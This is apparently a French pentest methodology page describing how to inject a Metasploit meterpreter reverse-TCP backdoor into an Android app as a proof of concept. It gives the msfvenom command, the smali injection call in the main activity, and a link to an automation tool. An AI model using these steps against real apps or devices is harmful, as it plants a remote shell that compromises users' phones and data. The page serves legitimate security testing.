💔Injection de backdoor
Dernière mise à jour
Dernière mise à jour
Si l'application ne semble pas faire de vérification d'intégrité, il peut être intéressant de PoC l'impact rendu possible en y ajoutant un payload meterpreter afin de montrer qu'il est possible de modifier l'application pour la transformer en trojan.
Générer une charge utile avec msfvenom
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<Listener IP> LPORT=<Listener Port> R > payload.apk
Décompiler l'application cible et l'application créée par msfvenom
Placer le code smali de l'application msfvenom dans le répertoire contenant le code smali de l'application cible.
/path/to/payload/smali/com/metasploit/stage dans /path/to/target/smali/com/metasploit/stage
Repérer l'activité principale de l'application cible dans son manifest.
Dans le code smali de l'activité principale, trouver le moyen d'appeler le code smali de l'application msfvenom.
Deviens, invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Ajouter les permissions nécessaires à l'application dans son manifest pour faire fonctionner meterpreter de façon optimale.
Lancer l'application et vérifier que le shell est bien lancé dans le listener.
Permet de faire exactement la même chose de manière semi-automatisé.
ressource: https://github.com/M4sc3r4n0/Evil-Droid